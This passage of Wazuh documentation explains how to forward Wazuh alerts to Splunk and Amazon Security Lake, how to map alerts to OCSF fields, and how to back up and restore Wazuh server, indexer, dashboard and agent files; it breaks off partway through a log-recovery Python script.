    Make sure to use your own paths for the executable, the pipeline, and the settings files.

    Ensure that Wazuh server RESTful API port (55000) is open on your Wazuh server. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete would not be forwarded to the Splunk indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance has logs that you can check in case something fails.

After Logstash is successfully running, check how to verify the integration.

Wazuh server integration using the Splunk forwarder

Before configuring the Splunk forwarder, you need to configure the Splunk indexer to receive the forwarded events. For this, you need to perform the following tasks on your Splunk server instance:

  • Set a receiving port.

  • Create the wazuh-alerts Splunk indexes.

Configuring Splunk indexer
Configuring the receiving port

Perform the following actions in Splunk Web:

  1. Go to Settings > Forwarding and receiving.

  2. Under Receive data, click Add new.

  3. Enter 9997 in the Listen on this port input box and click Save.

Alternatively, you can configure the receiving port in the following way.

Edit /opt/splunk/etc/system/local/inputs.conf on the Splunk server to add the following configuration:

[splunktcp://9997]
connection_host = none

For more details, visit enable a receiver section in the Splunk documentation.

Configuring indexes

Perform the following actions to configure the wazuh-alerts indexes in Splunk Web.

  1. Go to Settings > Indexes > New Index.

  2. Enter wazuh-alerts in Index name and click Save.

Alternatively, you can add the following configuration to the /opt/splunk/etc/system/local/indexes.conf file on the Splunk server to create the indexes:

[wazuh-alerts]
coldPath = $SPLUNK_DB/wazuh/colddb
enableDataIntegrityControl = 1
enableTsidxReduction = 1
homePath = $SPLUNK_DB/wazuh/db
maxTotalDataSizeMB = 512000
thawedPath = $SPLUNK_DB/wazuh/thaweddb
timePeriodInSecBeforeTsidxReduction = 15552000
tsidxReductionCheckPeriodInSec =
Installing Splunk forwarder on the Wazuh server

The Splunk forwarder must stream the data from the Wazuh server to the Splunk indexes created previously.

Follow the Splunk documentation to install the Splunk universal forwarder on the Wazuh Server.

Note

In Cloud instances, you need to configure the credentials for the Splunk forwarder. Check the configure the Splunk Cloud Platform universal forwarder credentials package documentation to learn how to do this.

Configuring the Splunk forwarder
  1. Set the following configuration in /opt/splunkforwarder/etc/system/local/inputs.conf file. This configures the Splunk forwarder to monitor the Wazuh /var/ossec/logs/alerts/alerts.json alerts file. Where <WAZUH_SERVER_HOST> is a name of your choice.

    [monitor:///var/ossec/logs/alerts/alerts.json]
    disabled = 0
    host = <WAZUH_SERVER_HOST>
    index = wazuh-alerts
    sourcetype = wazuh-alerts
    
  2. Set the following configuration in the /opt/splunkforwarder/etc/system/local/props.conf file to parse the data forwarded to Splunk:

    [wazuh-alerts]
    DATETIME_CONFIG =
    INDEXED_EXTRACTIONS = json
    KV_MODE = none
    NO_BINARY_CHECK = true
    category = Application
    disabled = false
    pulldown_type = true
    
  3. Set the following configuration in the /opt/splunkforwarder/etc/system/local/outputs.conf file to define how the alerts are forwarded to Splunk. Where <SPLUNK_INDEXER_ADDRESS> is your Splunk server IP address. For Cloud instances, the Splunk indexer address is the cloud instance address.

    defaultGroup = default-autolb-group
    
    [tcpout:default-autolb-group]
    server = <SPLUNK_INDEXER_ADDRESS>:9997
    
    [tcpout-server://<SPLUNK_INDEXER_ADDRESS>:9997]
    
Running the forwarder
  1. Start the Splunk Forwarder following Splunk documentation.

  2. Run the following command to verify the connection is established:

    $ sudo /opt/splunkforwarder/bin/splunk list forward-server
    
    Active forwards:
         <SPLUNK_INDEXER_ADDRESS>:9997
    Configured but inactive forwards:
         None
    

Note

The /opt/splunkforwarder/var/log/splunk/splunkd.log file in the forwarder instance has logs that you can check in case something fails.

Verifying the integration

To check the integration with Splunk, access Splunk Web and search for the wazuh-alerts Splunk index as follows.

  1. Go to Search & Reporting.

  2. Enter index="wazuh-alerts" and run the search.

Splunk dashboards

Wazuh provides several dashboards for Splunk.

After you complete the Splunk integration, you can use these dashboards to display your Wazuh alerts in Splunk.

To import the Wazuh dashboards for Splunk, repeat the following steps for each dashboard file you want to use.

  1. Download the dashboard file that you need from the list of Splunk dashboards provided above.

  2. Navigate to Search & Reporting in Splunk Web.

  3. Click Dashboards and click Create New Dashboard.

  4. Enter a dashboard title and select Dashboard Studio.

    Note

    The dashboard title you enter here will be overwritten with the original title set in the dashboard template.

  5. Select Grid and click on Create.

  6. Click on the </> Source icon.

  7. Paste your dashboard file content, replacing everything in the source.

  8. Click Back and click Save.

Amazon Security Lake integration

Note

This document guides you through setting up Wazuh as a data source for AWS Security Lake. To configure Wazuh as a subscriber to Amazon Security Lake, refer to Wazuh as a subscriber.

Wazuh Security Events can be converted to OCSF events and Parquet format, required by Amazon Security Lake, by using an AWS Lambda Python function, a Logstash instance and an AWS S3 bucket.

A properly configured Logstash instance can send the Wazuh Security events to an AWS S3 bucket, automatically invoking the AWS Lambda function that will transform and send the events to the Amazon Security lake dedicated S3 bucket.

The diagram below illustrates the process of converting Wazuh Security Events to OCSF events and to Parquet format for Amazon Security Lake.

Prerequisites
  • Amazon Security Lake is enabled.

  • At least one up and running Wazuh Indexer instance with populated wazuh-alerts-5.x-* indices.

  • A Logstash instance.

  • An S3 bucket to store raw events.

  • An AWS Lambda function, using the Python 3.12 runtime.

  • (Optional) An S3 bucket to store OCSF events, mapped from raw events.

AWS configuration
Enabling Amazon Security Lake

If you haven't already, ensure that you have enabled Amazon Security Lake by following the instructions at Getting started - Amazon Security Lake.

For multiple AWS accounts, we strongly encourage you to use AWS Organizations and set up Amazon Security Lake at the Organization level.

Creating an S3 bucket to store events

Follow the official documentation to create an S3 bucket within your organization. Use a descriptive name, for example: wazuh-aws-security-lake-raw.

Creating a Custom Source in Amazon Security Lake

Configure a custom source for Amazon Security Lake via the AWS console. Follow the official documentation to register Wazuh as a custom source.

To create the custom source:

  1. Log into your AWS console and navigate to Security Lake.

  2. Navigate to Custom Sources, and click Create custom source.

  3. Enter a descriptive name for your custom source. For example, wazuh.

  4. Choose Security Finding as the OCSF Event class.

  5. For AWS account with permission to write data, enter the AWS account ID and External ID of the custom source that will write logs and events to the data lake.

  6. For Service Access, create and use a new service role or use an existing service role that gives Security Lake permission to invoke AWS Glue.

  7. Click on Create. Upon creation, Amazon Security Lake automatically creates an AWS Service Role with permissions to push files into the Security Lake bucket, under the proper prefix named after the custom source name. An AWS Glue Crawler is also created to populate the AWS Glue Data Catalog automatically.

  8. Finally, collect the S3 bucket details, as these will be needed in the next step. Make sure you have the following information:

    • The Amazon Security Lake S3 region.

    • The S3 bucket name (e.g, aws-security-data-lake-us-east-1-AAABBBCCCDDD).

Creating an AWS Lambda function

Follow the official documentation to create an AWS Lambda function:

  1. Select Python 3.12 as the runtime.

  2. Configure the Lambda to use 512 MB of memory and 30 seconds timeout.

  3. Configure a trigger so every object with .txt extension uploaded to the S3 bucket created previously invokes the Lambda function.

  4. Create a zip deployment package and upload it to the S3 bucket created previously as per these instructions. The code is hosted in the Wazuh Indexer repository. Use the Makefile to generate the zip package wazuh_to_amazon_security_lake.zip.

    $ git clone https://github.com/wazuh/wazuh-indexer.git && cd wazuh-indexer
    $ git checkout v5.0.0
    $ cd integrations/amazon-security-lake
    $ make
    
  5. Configure the Lambda with these environment variables.

    Environment variable

    Required

    Value

    AWS_BUCKET

    True

    The name of the Amazon S3 bucket in which Security Lake stores your custom source data

    SOURCE_LOCATION

    True

    The Data source name of the Custom Source

    ACCOUNT_ID

    True

    Enter the ID that you specified when creating your Amazon Security Lake custom source

    REGION

    True

    AWS Region to which the data is written

    S3_BUCKET_OCSF

    False

    S3 bucket to which the mapped events are written

    OCSF_CLASS

    False

    The OCSF class to map the events into. Can be SECURITY_FINDING (default) or DETECTION_FINDING.

    Note

    The DETECTION_FINDING class is not supported by Amazon Security Lake yet.

Validation

To validate that the Lambda function is properly configured and works as expected, create a test file with the following command.

$ touch "$(date +'%Y%m%d')_ls.s3.wazuh-test-events.$(date +'%Y-%m-%dT%H.%M').part00.txt"

Add the sample events below to the file and upload it to the S3 bucket.

{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"timestamp":"2024-04-22T14:20:46.976+0000","rule":{"mail":false,"gdpr":["IV_30.1.g"],"groups":["audit","audit_command"],"level":3,"firedtimes":1,"id":"80791","description":"Audit: Command: /usr/sbin/crond"},"location":"","agent":{"id":"004","ip":"47.204.15.21","name":"Ubuntu"},"data":{"audit":{"type":"NORMAL","file":{"name":"/etc/sample/file"},"success":"yes","command":"cron","exe":"/usr/sbin/crond","cwd":"/home/wazuh"}},"predecoder":{},"manager":{"name":"wazuh-manager"},"id":"1580123327.49031","decoder":{},"@version":"1","@timestamp":"2024-04-22T14:20:46.976Z"}
{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"timestamp":"2024-04-22T14:22:03.034+0000","rule":{"mail":false,"gdpr":["IV_30.1.g"],"groups":["audit","audit_command"],"level":3,"firedtimes":1,"id":"80790","description":"Audit: Command: /usr/sbin/bash"},"location":"","agent":{"id":"007","ip":"24.273.97.14","name":"Debian"},"data":{"audit":{"type":"PATH","file":{"name":"/bin/bash"},"success":"yes","command":"bash","exe":"/usr/sbin/bash","cwd":"/home/wazuh"}},"predecoder":{},"manager":{"name":"wazuh-manager"},"id":"1580123327.49031","decoder":{},"@version":"1","@timestamp":"2024-04-22T14:22:03.034Z"}
{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"timestamp":"2024-04-22T14:22:08.087+0000","rule":{"id":"1740","mail":false,"description":"Sample alert 1","groups":["ciscat"],"level":9},"location":"","agent":{"id":"006","ip":"207.45.34.78","name":"Windows"},"data":{"cis":{"rule_title":"CIS-CAT 5","timestamp":"2024-04-22T14:22:08.087+0000","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","result":"notchecked","pass":52,"fail":0,"group":"Access, Authentication and Authorization","unknown":61,"score":79,"notchecked":1,"@timestamp":"2024-04-22T14:22:08.087+0000"}},"predecoder":{},"manager":{"name":"wazuh-manager"},"id":"1580123327.49031","decoder":{},"@version":"1","@timestamp":"2024-04-22T14:22:08.087Z"}

A successful execution of the Lambda function will map these events into the OCSF Security Finding Class and write them to the Amazon Security Lake S3 bucket in Parquet format, properly partitioned based on the Custom Source name, Account ID, AWS Region and date, as described in the official documentation.

Installing and configuring Logstash

Install Logstash on a dedicated server or on the server hosting the Wazuh Indexer. Logstash forwards the data from the Wazuh Indexer to the AWS S3 bucket created previously.

  1. Follow the official documentation to install Logstash.

  2. Install the logstash-input-opensearch plugin (this one is installed by default in most cases).

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
    
  3. Copy the Wazuh Indexer root certificate on the Logstash server, to any folder of your choice (e.g, /usr/share/logstash/root-ca.pem).

  4. Grant the logstash user the required permission to access certificates, log directories, data directories, and configuration files.

    $ sudo chmod 755 </PATH/TO/LOGSTASH_CERTS>/root-ca.pem
    $ sudo chown -R logstash:logstash /var/log/logstash
    $ sudo chmod -R 755 /var/log/logstash
    $ sudo chown -R logstash:logstash /var/lib/logstash
    $ sudo chown -R logstash:logstash /etc/logstash
    
Configuring the Logstash pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh Indexer and send them to an AWS S3 bucket.

The Logstash pipeline requires access to the following secrets:

  • Wazuh Indexer credentials: INDEXER_USERNAME and INDEXER_PASSWORD.

  • AWS credentials for the account with permissions to write to the S3 bucket: AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.

  • AWS S3 bucket details: AWS_REGION and S3_BUCKET (the S3 bucket name for raw events).

  1. Use the Logstash keystore to securely store these values.

  2. Create the configuration file indexer-to-s3.conf in the /etc/logstash/conf.d/ folder:

    $ sudo touch /etc/logstash/conf.d/indexer-to-s3.conf
    
  3. Add the following configuration to the indexer-to-s3.conf file.

    input {
        opensearch {
            hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
            user  =>  "${INDEXER_USERNAME}"
            password  =>  "${INDEXER_PASSWORD}"
            ssl => true
            ca_file => "</PATH/TO/LOGSTASH_CERTS>/root-ca.pem"
            index =>  "wazuh-alerts-4.x-*"
            query =>  '{
                "query": {
                    "range": {
                        "@timestamp": {
                        "gt": "now-5m"
                        }
                    }
                }
            }'
            schedule => "*/5 * * * *"
        }
    }
    
    output {
        stdout {
            id => "output.stdout"
            codec => json_lines
        }
        s3 {
            id => "output.s3"
            access_key_id => "${AWS_ACCESS_KEY_ID}"
            secret_access_key => "${AWS_SECRET_ACCESS_KEY}"
            region => "${AWS_REGION}"
            bucket => "${S3_BUCKET}"
            codec => "json_lines"
            retry_count => 0
            validate_credentials_on_root_bucket => false
            prefix => "%{+YYYY}%{+MM}%{+dd}"
            server_side_encryption => true
            server_side_encryption_algorithm => "AES256"
            additional_settings => {
            "force_path_style" => true
            }
            time_file => 5
        }
    }
    
Running Logstash
  1. Run Logstash from the CLI with your configuration:

    • Logstash 8.x and earlier versions:

      $ sudo systemctl stop logstash
      $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/indexer-to-s3.conf --path.settings /etc/logstash --config.test_and_exit
      
    • Logstash 9.x and later versions:

      $  sudo systemctl stop logstash
      $ sudo -u logstash /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/indexer-to-s3.conf --path.settings /etc/logstash --config.test_and_exit
      
  2. After confirming that the configuration loads correctly without errors, run Logstash as a service.

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    
OCSF Mapping

The integration maps Wazuh Security Events to the OCSF v1.1.0 Security Finding (2001) Class.

The tables below represent how the Wazuh Security Events are mapped into the OCSF Security Finding Class.

Note

This does not reflect any transformations or evaluations of the data. Some data evaluation and transformation will be necessary for a correct representation in OCSF that matches all requirements.

Metadata

OCSF Key

OCSF Value Type

Value

category_uid

Integer

2

category_name

String

"Findings"

class_uid

Integer

2001

class_name

String

"Security Finding"

type_uid

Long

200101

metadata.product.name

String

"Wazuh"

metadata.product.vendor_name

String

"Wazuh, Inc."

metadata.product.version

String

"4.9.0"

metadata.product.lang

String

"en"

metadata.log_name

String

"Security events"

metadata.log_provider

String

"Wazuh"

Security events

OCSF Key

OCSF Value Type

Wazuh Event Value

activity_id

Integer

1

time

Timestamp

timestamp

message

String

rule.description

count

Integer

rule.firedtimes

finding.uid

String

id

finding.title

String

rule.description

finding.types

String Array

input.type

analytic.category

String

rule.groups

analytic.name

String

decoder.name

analytic.type

String

"Rule"

analytic.type_id

Integer

1

analytic.uid

String

rule.id

risk_score

Integer

rule.level

attacks.tactic.name

String

rule.mitre.tactic

attacks.technique.name

String

rule.mitre.technique

attacks.technique.uid

String

rule.mitre.id

attacks.version

String

"v13.1"

nist

String Array

rule.nist_800_53

severity_id

Integer

convert(rule.level)

status_id

Integer

99

resources.name

String

agent.name

resources.uid

String

agent.id

data_sources

String Array

['_index', 'location', 'manager.name']

raw_data

String

full_log

Troubleshooting

Issue

Resolution

The Wazuh alert data is available in the Amazon Security Lake S3 bucket, but the Glue Crawler fails to parse the data into the Security Lake.

This issue typically occurs when the custom source that is created for the integration is using the wrong event class. Make sure you create the custom source with the Security Finding event class.

The Wazuh alerts data is available in the Auxiliar S3 bucket, but the Lambda function does not trigger or fails.

This usually happens if the Lambda is not properly configured, or if the data is not in the correct format. Test the Lambda following this guide.

Logstash fails to start with the message: Path "/var/lib/logstash/queue" must be a writable directory. It is not writable.

The logstash user does not have permission to write to one or more required directories. Grant the necessary permissions:

sudo chown -R logstash:logstash /var/log/logstash
sudo chmod -R 755 /var/log/logstash
sudo chown -R logstash:logstash /var/lib/logstash
sudo chown -R logstash:logstash /etc/logstash

Logstash 9.0+ fails with: Running Logstash as a superuser is not allowed

Starting from Logstash 9.0, running as the root user is blocked for security reasons. Run Logstash using the logstash system account:

sudo -u logstash /usr/share/logstash/bin/logstash \
       -f /etc/logstash/conf.d/indexer-to-s3.conf \
       --path.settings /etc/logstash --config.test_and_exit

Backup guide

In this section you can find instructions on how to create and restore a backup of your Wazuh installation.

To do this backup, copy the key files to a designated folder while preserving file permissions, ownership, and directory structure. This ensures you can later restore your Wazuh data, certificates, and configurations by transferring the files back to their original locations. This method is particularly useful when migrating your Wazuh installation to a new system.

Creating a backup

This guide explains how to create a backup of your Wazuh files, such as logs, and configurations. Backing up Wazuh files is useful when migrating your Wazuh installation to a different system.

The Restoring Wazuh from backup documentation provides a guide to restore a backup of your Wazuh central components and Wazuh agent files.

Wazuh central components

To create a backup of the central components of your Wazuh installation, follow these steps. Repeat them on every cluster node you want to back up.

Note

You need root user privileges to execute the commands below.

Preparing the backup
  1. Create the destination folder to store the files. For version control, add the date and time of the backup to the name of the folder.

    # bkp_folder=~/wazuh_files_backup/$(date +%F_%H:%M)
    # mkdir -p $bkp_folder && echo $bkp_folder
    
  2. Save the host information.

    # cat /etc/*release* > $bkp_folder/host-info.txt
    # echo -e "\n$(hostname): $(hostname -I)" >> $bkp_folder/host-info.txt
    
Backing up the Wazuh server
  1. Back up the Wazuh server data and configuration files.

    # rsync -aREz \
    /etc/filebeat/ \
    /etc/postfix/ \
    /var/ossec/api/configuration/ \
    /var/ossec/etc/client.keys \
    /var/ossec/etc/sslmanager* \
    /var/ossec/etc/ossec.conf \
    /var/ossec/etc/internal_options.conf \
    /var/ossec/etc/local_internal_options.conf \
    /var/ossec/etc/rules/local_rules.xml \
    /var/ossec/etc/decoders/local_decoder.xml \
    /var/ossec/etc/shared/ \
    /var/ossec/logs/ \
    /var/ossec/queue/agentless/ \
    /var/ossec/queue/agents-timestamp \
    /var/ossec/queue/fts/ \
    /var/ossec/queue/rids/ \
    /var/ossec/stats/ \
    /var/ossec/var/multigroups/ $bkp_folder
    
  2. If present, back up certificates and additional configuration files.

    # rsync -aREz \
    /var/ossec/etc/*.pem \
    /var/ossec/etc/authd.pass $bkp_folder
    
  3. Back up your custom files. If you have custom active responses, CDB lists, integrations, or wodles, adapt the following command accordingly.

    # rsync -aREz \
    /var/ossec/active-response/bin/<custom_AR_script> \
    /var/ossec/etc/lists/<user_cdb_list>.cdb \
    /var/ossec/integrations/<custom_integration_script> \
    /var/ossec/wodles/<custom_wodle_script> $bkp_folder
    
  4. Stop the Wazuh manager service to prevent modification attempts while copying the Wazuh databases.

    # systemctl stop wazuh-manager
    
  5. Back up the Wazuh databases. They hold collected data from agents.

    # rsync -aREz \
    /var/ossec/queue/db/ $bkp_folder
    
  6. Start the Wazuh manager service.

    # systemctl start wazuh-manager
    
Backing up the Wazuh indexer and dashboard
  1. Back up the Wazuh indexer certificates and configuration files.

    # rsync -aREz \
    /etc/wazuh-indexer/certs/ \
    /etc/wazuh-indexer/jvm.options \
    /etc/wazuh-indexer/jvm.options.d \
    /etc/wazuh-indexer/log4j2.properties \
    /etc/wazuh-indexer/opensearch.yml \
    /etc/wazuh-indexer/opensearch.keystore \
    /etc/wazuh-indexer/opensearch-observability/ \
    /etc/wazuh-indexer/opensearch-reports-scheduler/ \
    /etc/wazuh-indexer/opensearch-security/ \
    /usr/lib/sysctl.d/wazuh-indexer.conf $bkp_folder
    
  2. Back up the Wazuh dashboard certificates and configuration files.

    # rsync -aREz \
    /etc/wazuh-dashboard/certs/ \
    /etc/wazuh-dashboard/opensearch_dashboards.yml \
    /usr/share/wazuh-dashboard/config/opensearch_dashboards.keystore \
    /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml $bkp_folder
    
  3. If present, back up your downloads and custom images.

    # rsync -aREz \
    /usr/share/wazuh-dashboard/data/wazuh/downloads/ \
    /usr/share/wazuh-dashboard/plugins/wazuh/public/assets/custom/images/ $bkp_folder
    

Note

While you're already backing up alert files, consider backing up the cluster indices and state as well. State includes cluster settings, node information, index metadata, and shard allocation.

Check the backup
  1. Verify that the Wazuh manager is active and list all the backed up files:

    # systemctl status wazuh-manager
    
    # find $bkp_folder -type f | sed "s|$bkp_folder/||" | less
    

Wazuh agent

To create a backup of your Wazuh agent installation follow these steps.

Note

You need elevated privileges to execute the commands below.

Preparing the backup
  1. On the agent machine you're doing the back up for, run the following commands to create the destination folder where to store the files. These commands use date and time references for the folder name to keep files separated from old backups you might have.

    # bkp_folder=~/wazuh_files_backup/$(date +%F_%H:%M)
    # mkdir -p $bkp_folder && echo $bkp_folder
    
Backing up a Wazuh agent
  1. Back up Wazuh agent data, certificates, and configuration files.

    # rsync -aREz \
    /var/ossec/etc/client.keys \
    /var/ossec/etc/ossec.conf \
    /var/ossec/etc/internal_options.conf \
    /var/ossec/etc/local_internal_options.conf \
    /var/ossec/etc/*.pem \
    /var/ossec/logs/ \
    /var/ossec/queue/rids/ $bkp_folder
    
  2. Back up your custom files such as local SCA policies, active response scripts, and wodles.

    # rsync -aREz /var/ossec/etc/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE> $bkp_folder
    # rsync -aREz /var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> $bkp_folder
    # rsync -aREz /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> $bkp_folder
    
Checking the backup
  1. Check everything is in place and working

    # find $bkp_folder -type f | sed "s|$bkp_folder/||" | less
    

Restoring Wazuh from backup

This guide explains how to restore a backup of your Wazuh files, such as logs, and configurations. Restoring Wazuh files can be useful when migrating your Wazuh installation to a different system. To carry out this restoration, you first need to back up the necessary files. The Creating a backup documentation provides a guide that you can follow in creating a backup of the Wazuh central components and Wazuh agent data.

Note

This guide is designed specifically for restoration from a backup of the same version.

Wazuh central components

Perform the following actions to restore the Wazuh central components data, depending on your deployment type.

Note

For a multi-node setup, there should be a backup file for each node within the cluster. You need root user privileges to execute the commands below.

Single-node data restoration

You need to have a new installation of Wazuh. Follow the Quickstart guide to perform a fresh installation of the Wazuh central components on a new server.

The actions below will guide you through the data restoration process for a single-node deployment.

Preparing the data restoration
  1. Compress the files generated after performing Wazuh files backup and transfer them to the new server:

    # tar -cvzf wazuh_central_components.tar.gz ~/wazuh_files_backup/
    
  2. Move the compressed file to the root / directory of your node:

    # mv wazuh_central_components.tar.gz /
    # cd /
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files:

    # tar -xzvf wazuh_central_components.tar.gz
    # cd ~/wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh indexer files

Perform the following steps to restore the Wazuh indexer files on the new server.

  1. Stop the Wazuh indexer to prevent any modifications to the Wazuh indexer files during the restoration process:

    # systemctl stop wazuh-indexer
    
  2. Restore the Wazuh indexer configuration files and change the file permissions and ownerships accordingly:

    # sudo cp etc/wazuh-indexer/jvm.options /etc/wazuh-indexer/jvm.options
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options
    # sudo cp -r etc/wazuh-indexer/jvm.options.d/* /etc/wazuh-indexer/jvm.options.d/
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options.d
    # sudo cp etc/wazuh-indexer/log4j2.properties /etc/wazuh-indexer/log4j2.properties
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/log4j2.properties
    # sudo cp etc/wazuh-indexer/opensearch.keystore /etc/wazuh-indexer/opensearch.keystore
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch.keystore
    # sudo cp -r etc/wazuh-indexer/opensearch-observability/* /etc/wazuh-indexer/opensearch-observability/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-observability/
    # sudo cp -r etc/wazuh-indexer/opensearch-reports-scheduler/* /etc/wazuh-indexer/opensearch-reports-scheduler/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-reports-scheduler/
    # sudo cp usr/lib/sysctl.d/wazuh-indexer.conf /usr/lib/sysctl.d/wazuh-indexer.conf
    
  3. Start the Wazuh indexer service:

    # systemctl start wazuh-indexer
    
Restoring Wazuh server files

Perform the following steps to restore the Wazuh server files on the new server.

  1. Stop the Wazuh manager and Filebeat to prevent any modification to the Wazuh server files during the restore process:

    # systemctl stop filebeat
    # systemctl stop wazuh-manager
    
  2. Copy the Wazuh server data and configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp etc/filebeat/filebeat.reference.yml /etc/filebeat/
    # sudo cp etc/filebeat/fields.yml /etc/filebeat/
    # sudo cp -r etc/filebeat/modules.d/* /etc/filebeat/modules.d/
    # sudo cp -r etc/postfix/* /etc/postfix/
    # sudo cp var/ossec/etc/client.keys /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/client.keys
    # sudo cp -r var/ossec/etc/sslmanager* /var/ossec/etc/
    # sudo cp var/ossec/etc/ossec.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/ossec.conf
    # sudo cp var/ossec/etc/internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/internal_options.conf
    # sudo cp var/ossec/etc/local_internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/local_internal_options.conf
    # sudo cp -r var/ossec/etc/rules/* /var/ossec/etc/rules/
    # chown -R wazuh:wazuh /var/ossec/etc/rules/
    # sudo cp -r var/ossec/etc/decoders/* /var/ossec/etc/decoders
    # chown -R wazuh:wazuh /var/ossec/etc/decoders/
    # sudo cp -r var/ossec/etc/shared/* /var/ossec/etc/shared/
    # chown -R wazuh:wazuh /var/ossec/etc/shared/
    # chown root:wazuh /var/ossec/etc/shared/ar.conf
    # sudo cp -r var/ossec/logs/* /var/ossec/logs/
    # chown -R wazuh:wazuh /var/ossec/logs/
    # sudo cp -r var/ossec/queue/agentless/*  /var/ossec/queue/agentless/
    # chown -R wazuh:wazuh /var/ossec/queue/agentless/
    # sudo cp var/ossec/queue/agents-timestamp /var/ossec/queue/
    # chown root:wazuh /var/ossec/queue/agents-timestamp
    # sudo cp -r var/ossec/queue/fts/* /var/ossec/queue/fts/
    # chown -R wazuh:wazuh /var/ossec/queue/fts/
    # sudo cp -r var/ossec/queue/rids/* /var/ossec/queue/rids/
    # chown -R wazuh:wazuh /var/ossec/queue/rids/
    # sudo cp -r var/ossec/stats/* /var/ossec/stats/
    # chown -R wazuh:wazuh /var/ossec/stats/
    # sudo cp -r var/ossec/var/multigroups/* /var/ossec/var/multigroups/
    # chown -R wazuh:wazuh /var/ossec/var/multigroups/
    
  3. Restore certificates for Wazuh agent and Wazuh server communication, and additional configuration files if present:

    # sudo cp -r var/ossec/etc/*.pem /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/*.pem
    # sudo cp var/ossec/etc/authd.pass /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/authd.pass
    
  4. Restore your custom files. If you have custom active response scripts, CDB lists, integrations, or wodles, adapt the following commands accordingly:

    # sudo cp var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> /var/ossec/active-response/bin/
    # chown root:wazuh /var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT>
    # sudo cp var/ossec/etc/lists/<USER_CDB_LIST>.cdb /var/ossec/etc/lists/
    # chown root:wazuh /var/ossec/etc/lists/<USER_CDB_LIST>.cdb
    # sudo cp var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT> /var/ossec/integrations/
    # chown root:wazuh /var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT>
    # sudo cp var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> /var/ossec/wodles/
    # chown root:wazuh /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT>
    
  5. Restore the Wazuh databases that contain collected data from the Wazuh agents:

    # sudo cp var/ossec/queue/db/* /var/ossec/queue/db/
    # chown -R wazuh:wazuh /var/ossec/queue/db/
    
  6. Start the Filebeat service:

    # systemctl start filebeat
    
  7. Start the Wazuh manager service:

    # systemctl start wazuh-manager
    
Restoring Wazuh dashboard files

Perform the following steps to restore Wazuh reports and custom images on the new server if you have any from your backup.

  1. Restore your Wazuh reports using the following command:

    # mkdir -p /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # sudo cp -r usr/share/wazuh-dashboard/data/wazuh/downloads/reports/* /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # chown -R wazuh-dashboard:wazuh-dashboard /usr/share/wazuh-dashboard/data/wazuh/downloads/
    
  2. Navigate to Dashboard management > App Settings > Custom branding from the Wazuh dashboard and upload your custom images.

Restoring old logs

Wazuh, by default, compresses logs that are older than a day. While performing old log restoration in the Restoring Wazuh server files section, the old logs remain compressed.

Perform the following actions on your Wazuh server to decompress these logs and index them in the new Wazuh indexer:

Note

Restoring old logs will have a creation date of the day when the restoration is performed.

  1. Create a Python script called recovery.py on your Wazuh server. This script decompresses all the old logs and stores them in the recovery.json file in the /tmp directory:

    # touch recovery.py
    
  2. Add the following content to the recovery.py script:

    #!/usr/bin/env python
    
    import gzip
    import time
    import json
    import argparse
    import re
    import os
    from datetime import datetime
    from datetime import timedelta
    
    def log(msg):
        now_date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        final_msg = "{0} wazuh-reinjection: {1}".format(now_date, msg)
        print(final_msg)
        if log_file:
            f_log.write(final_msg + "\n")
    
    EPS_MAX = 400
    wazuh_path = '/var/ossec/'
    max_size=1
    log_file = None
    
    parser = argparse.ArgumentParser(description='Reinjection script')
    parser.add_argument('-eps','--eps', metavar='eps', type=int, required = False, help='Events per second.')
    parser.add_argument('-min', '--min_timestamp', metavar='min_timestamp', type=str, required = True, help='Min timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-max', '--max_timestamp', metavar='max_timestamp', type=str, required = True, help='Max timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-o', '--output_file', metavar='output_file', type=str, required = True, help='Output filename.')
